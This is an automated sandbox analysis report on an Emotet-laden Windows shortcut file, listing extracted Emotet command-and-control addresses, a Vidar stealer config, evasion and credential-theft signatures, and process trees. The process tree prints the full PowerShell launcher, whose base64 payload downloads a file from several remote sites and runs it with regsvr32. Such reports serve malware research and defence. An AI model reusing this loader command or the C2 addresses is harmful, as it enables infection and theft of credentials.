emotet | cde9b766bf2966ed7f0396fee7e23fdb7246b534affd58f6d4caf50237ff110b

Resubmissions

26-04-2022 20:07

220426-ywbl8saabq 10

26-04-2022 19:59

220426-yqv4paebd5 10

Analysis

max time kernel
319s
max time network
322s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
26-04-2022 20:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Electronic form 04.26.2022, USA.lnk
Size

2KB
MD5

e87c1ae2b8c7e85b6431d420310df80e
SHA1

683ab8df53a58982807ef65f3b68bb2bbab6fc6e
SHA256

cde9b766bf2966ed7f0396fee7e23fdb7246b534affd58f6d4caf50237ff110b
SHA512

c7959fed580f4e6096c345973fd2c19b049cf3e8539f391321a61fd4ff18fd4d7683cfb5534c38cf9ad9cc26cd99eb3a8f142b13b2430b761f78272b937e0c45

Score

10^/10

emotet vidar 1281 epoch4 banker discovery evasion spyware stealer suricata trojan

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

138.201.142.73:8080

138.197.147.101:443

134.195.212.50:7080

104.168.154.79:8080

149.56.131.28:8080

129.232.188.93:443

212.24.98.99:8080

119.193.124.41:7080

45.118.115.99:8080

188.44.20.25:443

103.132.242.26:8080

201.94.166.162:443

1.234.21.73:7080

206.189.28.199:8080

185.8.212.130:7080

82.165.152.127:8080

176.104.106.96:8080

173.212.193.249:8080

167.99.115.35:8080

209.126.98.206:8080

eck1.plain

ecs1.plain

Extracted

Family

vidar

Version

51.9

Botnet

1281

https://koyu.space/@ronxik123

Attributes

profile_id
1281

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 12 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/372-167-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/372-169-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/372-170-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/372-171-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/372-172-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/372-173-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/1716-211-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/1716-212-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/1716-213-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/1716-214-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/1716-215-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar
behavioral1/memory/1716-216-0x00000000000E0000-0x00000000009AB000-memory.dmp	family_vidar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

23 4732 powershell.exe
29 4732 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Setup.exeSetup.exe

pid process

372 Setup.exe
1716 Setup.exe

flow	pid	process
23	4732	powershell.exe
29	4732	powershell.exe

pid	process
372	Setup.exe
1716	Setup.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Setup.exeSetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Setup.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe
Loads dropped DLL 4 IoCs

Processes:

regsvr32.exeregsvr32.exeSetup.exe

pid process

4696 regsvr32.exe
3500 regsvr32.exe
372 Setup.exe
372 Setup.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
4696	regsvr32.exe
3500	regsvr32.exe
372	Setup.exe
372	Setup.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Setup.exeSetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe

Drops file in System32 directory 1 IoCs

Processes:

regsvr32.exe

description ioc process

File opened for modification C:\Windows\system32\Yqhvnff\cyxtqmxkdinpka.sch regsvr32.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Setup.exeSetup.exe

pid process

372 Setup.exe
1716 Setup.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\system32\Yqhvnff\cyxtqmxkdinpka.sch	regsvr32.exe

pid	process
372	Setup.exe
1716	Setup.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exeSetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry class 1 IoCs

Processes:

taskmgr.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings taskmgr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeregsvr32.exetaskmgr.exe

pid	process
3232	powershell.exe
3232	powershell.exe
4732	powershell.exe
4732	powershell.exe
3500	regsvr32.exe
3500	regsvr32.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

1360 taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

Processes:

chrome.exe

pid	process
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exetaskmgr.exe7zG.exe

description	pid	process
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	1360	taskmgr.exe
Token: SeSystemProfilePrivilege	1360	taskmgr.exe
Token: SeCreateGlobalPrivilege	1360	taskmgr.exe
Token: SeRestorePrivilege	2268	7zG.exe
Token: 35	2268	7zG.exe
Token: SeSecurityPrivilege	2268	7zG.exe
Token: SeSecurityPrivilege	2268	7zG.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe
1360	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exepowershell.exeregsvr32.exechrome.exe

description	pid	process	target process
PID 4468 wrote to memory of 3232	4468	cmd.exe	powershell.exe
PID 4468 wrote to memory of 3232	4468	cmd.exe	powershell.exe
PID 3232 wrote to memory of 4732	3232	powershell.exe	powershell.exe
PID 3232 wrote to memory of 4732	3232	powershell.exe	powershell.exe
PID 4732 wrote to memory of 4696	4732	powershell.exe	regsvr32.exe
PID 4732 wrote to memory of 4696	4732	powershell.exe	regsvr32.exe
PID 4696 wrote to memory of 3500	4696	regsvr32.exe	regsvr32.exe
PID 4696 wrote to memory of 3500	4696	regsvr32.exe	regsvr32.exe
PID 784 wrote to memory of 3012	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3012	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1284	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1844	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1844	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 1792	784	chrome.exe	chrome.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Electronic form 04.26.2022, USA.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "Electronic form 04.26.2022, USA.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2htZW5nLmNvLnVrL2NnaS1iaW4vSC8iLCJodHRwczovL2Vkb3Jhc2VndXJvcy5jb20uYnIvY2dpLWJpbi9taDNNTUdLZmhYdEovIiwiaHR0cHM6Ly93d3cucmVuZWV0dGVuLm5sL01lbnUvWE5NaHg2blNubnBwOGFaemsvIiwiaHR0cDovL2JyZW5kYW5jbGVhcnkubmV0L2ltYWdlcy9vSUxFSnhPYjAyMU9naEdkeHMvIiwiaHR0cHM6Ly9iZW5jZXZlbmRlZ2hhei5odS93cC1pbmNsdWRlcy9pVVd2VU5xLyIsImh0dHA6Ly9hbmF0LWJhci5jby5pbC93cC1hZG1pbi9ENkxpczVDdHJNZHVyTS8iKTtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZW52OlRFTVAvd1p4cGNHaHFQeC5lcVo7UmVnc3ZyMzIuZXhlICRlbnY6VEVNUC93WnhwY0docVB4LmVxWjticmVha30gY2F0Y2ggeyB9fQ==')) > "C:\Users\Admin\AppData\Local\Temp\hgUQRrLvVK.ps1"; powershell -executionpolicy bypass -file "$env:TEMP/\hgUQRrLvVK.ps1"; Remove-Item "$env:TEMP/\hgUQRrLvVK.ps1" -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp/\hgUQRrLvVK.ps1
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4732

C:\Windows\system32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp/wZxpcGhqPx.eqZ
4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4696

C:\Windows\system32\regsvr32.exe
C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Yqhvnff\cyxtqmxkdinpka.sch"
5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3500

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcc67c4f50,0x7ffcc67c4f60,0x7ffcc67c4f70
2⤵
PID:3012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1708 /prefetch:2
2⤵
PID:1284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1804 /prefetch:8
2⤵
PID:1844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2364 /prefetch:8
2⤵
PID:1792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1
2⤵
PID:4544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:1
2⤵
PID:3544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
2⤵
PID:3952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4632 /prefetch:8
2⤵
PID:2372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4676 /prefetch:8
2⤵
PID:4508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4624 /prefetch:8
2⤵
PID:2356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 /prefetch:8
2⤵
PID:2244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8
2⤵
PID:4680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4708 /prefetch:8
2⤵
PID:1424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:8
2⤵
PID:4912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5000 /prefetch:8
2⤵
PID:3768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4844 /prefetch:8
2⤵
PID:3616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5660 /prefetch:8
2⤵
PID:5040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4656 /prefetch:8
2⤵
PID:4384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,7195875900838007562,15321469634026693524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4648 /prefetch:8
2⤵
PID:4548

C:\Program Files\Google\Chrome\Application\chrome.exe
